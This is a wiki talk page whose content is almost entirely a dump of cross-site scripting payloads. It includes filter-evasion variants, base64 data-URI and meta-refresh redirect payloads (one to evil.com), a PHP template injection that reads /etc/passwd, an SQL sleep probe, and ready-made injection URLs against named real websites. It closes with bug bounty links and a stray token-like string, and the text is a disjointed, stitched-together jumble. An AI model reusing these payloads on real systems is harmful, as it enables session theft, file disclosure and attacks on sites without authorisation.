Category talk:CAT tools
"></img><img src=x onerror=confirm(/Xss-By-Arafat/)>/ </textarea><ScRiPt>prompt(/920065/)</ScRiPt// "><iframe/onload=alert(document.domain)// "><iframe/src=javascript%26colon;[document.domain].find(alert)> <vipin oncopy =prompt(document.domain)> " ="" '><svg onload=setInterval`prompt\x28document.domain\x29` Template loop detected: Template:Constructor.constructor('alert(1)')() <?='<SCRIPT>alert("XSS")</SCRIPT>'?> <--`</a></script></svg><img src="`" onerror="alert(1)"> --!> https://bitsrc.io/
<a href=javascript:alert(1)> <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// qwe<details open ontoggle=alert.apply(self,[document.domain])>qwe
"--!><svg/onload=prompt(/OPENBUGBOUNTY/)>"
xss"> "/**/autofocus/**/onfocus="alert('XSSPOSED');" "></sCrIPt><sCRIPt>confirm(/XSs;/)</ScRiPt>
- print(md5(xss)); set|set&set
</input><input type=``text``//;valaue=`` autofocus onfocus=alert(1) a=``> <img src=1 alt=al lang=ert onerror=top[alt+lang](0)> <script>$=1,alert($)</script> <script Yeasir Arafat>confirm(1)</script Yeasir Arafat> <script>$=1,\u0061lert($)</script> <</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script> <</script/script><script Yeasir Arafat>\u0061lert(1)</script Yeasir Arafat> </style></scRipt><scRipt>alert(1)</scRipt> <img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)> <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)> <svg><x><script>alert('1')</x> <iframe src=""/srcdoc='<svg onload=alert(1)>'> Template:7*7"><iframe/onload=alert(document.domain)// <sVg/oNloAd=//><sVg/oNloAd=alert("XSS2")//>@gmail.com
\”}})})-confirm`1`;(function(){({if(){/*/// \”}})})-confirm`1`(a=>{({b:{/*/// \”-confirm`1`// javascript:alert(1);// javascript:alert(document.domain) "onmouseover="prompt(document.domain) h/<\i<script>alert("i");</script> "><marquee><IMG src=x onmouseover=prompt(document.domain);></marquee> https://www.playstation.com/en-us/search/?q=" /><script>alert(1);// ' -confirm(document.domain)-'# "><img/src='1'onerror=alert(1)> "><svg/onload=alert(domain)> "><script>alert('xss')</script> "><img src=x onerror=alert(domain)>@ymail.com "><img src=x onerror=prompt(document.domain)>" "> <img src="x" onerror="prompt(domain)"></img>
- "><img src=c onerror=alert(1)>/
- //><img src=x><svg/onload=confirm("Xss-By-Arafat")>
</script><video src=x onerror=alert(document.domain)> "></sCrIPt><sCRIPt>confirm(/XSs;/)</ScRiPt> javascript://google.com/?%0aalert(document.domain) <img src=x onerror=prompt(999)> "><img/src=1 onerror=alert(1)> %22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%280%29%3E aaa">fffff</script><script>alert(document.domain)</script>aaaaa "></title><img src=1 onerror=prompt(document.domain)> %27%22%3E%3Cscript%3Ealert%28%27XSS%[email protected]%20%27%2bdocument.domain%29%3C%2fscript%3E
0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg" HTTP-EQUIV="refresh" a="a >> meta tag
0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"
0;data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"HTTP-EQUIV="refresh"
0;http://evil.com"HTTP-EQUIV="refresh"
<input type="text" value="" onmouseover="alert('XSS')">
url=google.com:/onclick='alert(document.domain)'[url=]]xss[/url]
![xss" onload=alert(1);//](a)
javascripT://https://google.com%0aalert(1);//https://google.com
This is an outdated page. You will now be redirected to our new page"); window.location="https://google.com"//
JaVaScRiPT%0a:alert(document.cookie)
<form><button formaction="javascript:alert(123)">xss
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{7*7} Template:7*7
<img/src=`%00` onerror=this.onerror=alert(document.cooki)
<svg/on<script>load=prompt(document.domain);>”/><svg/on<script>load=prompt(document.cookie);>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">poc</a>
https://google.com\'onmouseover='prompt(1)'
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">poc</a>
<img ismap='xxx' itemtype='yyy style=width:100%;height:100%;position:fixed;left:\ 0px;top:0px; onmouseover=alert(/XSS/)//'>
"></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('POST','https://www.facebook.com',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
<sCrIpt>alert(1)</ScRipt> <script x> <script x>alert('XSS')<script y> <img src='1' onerror='alert(0)' <
String.fromCharCode(88,83,83)
http://localhost/bla.php?test=</script><script>alert(1)</script> <html>
<script> <?php echo 'foo="text '.$_GET['test'].'";';`?> </script>
</html> Bypass quotes in mousedown event
<a href="" onmousedown="var name = '';alert(1)//'; alert('smthg')">Link</a>
<script>window['alert'](document['domain'])<script>
alert`1`
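Bypass onxxxx= blacklist (the variants below put control characters or a slash around the handler name, which is why pattern-matching on event-handler names is an unreliable filter; contextual output encoding does not depend on recognising the name)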
<object onafterscriptexecute=confirm(0)> <object onbeforescriptexecute=confirm(0)>
<img src='1' onerror\x00=alert(0) /> <img src='1' onerror\x0b=alert(0) />
<img src='1' onerror/=alert(0) />
<img/src='1'/onerror=alert(0)>
<script>alert(x.parentNode.parentNode.parentNode.location)</script><script> foo="text </script><script>alert(1)</script>"; </script>
- JS/URL polyglot
data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}
- WASM
https://vulnerabledoma.in/polyglot/wasmjscsshtml.html
- BlindXSS
'">*/--></title></style></textarea></script%0A><img src=x onerror=confirm(1)>
- xss
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
- xss2
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
- xss3
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> 
- sqli
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
https://medium.com/@arbazhussain/stored-xss-on-rockstar-game-c008ec18d071
Rules >
http://h1.nobbd.de/
http://bugbountyworld.com/
https://medium.com/@phwd
https://whitton.io/
https://medium.com/@arbazhussain/10-rules-of-bug-bounty-65082473ab8c
Facebook>> https://web.facebook.com/notes/phwd/facebook-bug-bounties-the-unofficial-treasure-map/1020506894706001?_rdc=1&_rdr https://medium.com/@rajsek/my-3rd-facebook-bounty-hat-trick-chennai-tcs-er-name-listed-in-facebook-hall-of-fame-47f57f2a4f71
& </script><script>alert(document.domain)</script>
https://www.ah.nl/producten/%22%3E%3C/img%3E%3Cimg%20src=x%20onerror=confirm(/Xss-By-Arafat/)%3E/%20%3C/textarea%3E%3CScRiPt%3Eprompt(/920065/)%3C/ScRiPt//%20%22%3E%3Ciframe/onload=alert(document.domain)//%20%22%3E%3Ciframe/src=javascript%26colon;[document.domain].find(alert)%3E%20%3Cvipin%20oncopy%20=prompt(document.domain)%3E
https://www.ah.nl/favorieten/%22%3E%3C/img%3E%3Cimg%20src=x%20onerror=confirm(/Xss-By-Arafat/)%3E/%20%3C/textarea%3E%3CScRiPt%3Eprompt(/920065/)%3C/ScRiPt//%20%22%3E%3Ciframe/onload=alert(document.domain)//%20%22%3E%3Ciframe/src=javascript%26colon;[document.domain].find(alert)%3E%20%3Cvipin%20oncopy%20=prompt(document.domain)%3E
https://www.ah.nl/mijnlijst/%22%3E%3C/img%3E%3Cimg%20src=x%20onerror=confirm(/Xss-By-Arafat/)%3E/%3C/textarea%3E%3CScRiPt%3Eprompt(/920065/)%3C/ScRiPt//%22%3E%3Ciframe/onload=alert(document.domain)//%22%3E%3Ciframe/src=javascript%26colon;[document.domain].find(alert)%3E%3Cvipin%20oncopy%20=prompt(document.domain)%3E
https://www.ah.nl/kies-moment/ophalen-winkel/%22%3E%3C/img%3E%3Cimg%20src=x%20onerror=confirm(/Xss-By-Arafat/)%3E/%20%3C/textarea%3E%3CScRiPt%3Eprompt(/920065/)%3C/ScRiPt//%20%22%3E%3Ciframe/onload=alert(document.domain)//%20%22%3E%3Ciframe/src=javascript%26colon;[document.domain].find(alert)%3E%20%3Cvipin%20oncopy%20=prompt(document.domain)%3E
https://entry.xing-events.com/fastregistration.html
https://analytics.google.com/analytics/web/#/a125856235w184525757p181875971/admin
https://expomanager.xing-events.com/forgotPassword.html?10
3mvdCX86-EB_OoIH6H8zzmv9Of3WmgnOXDuw
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx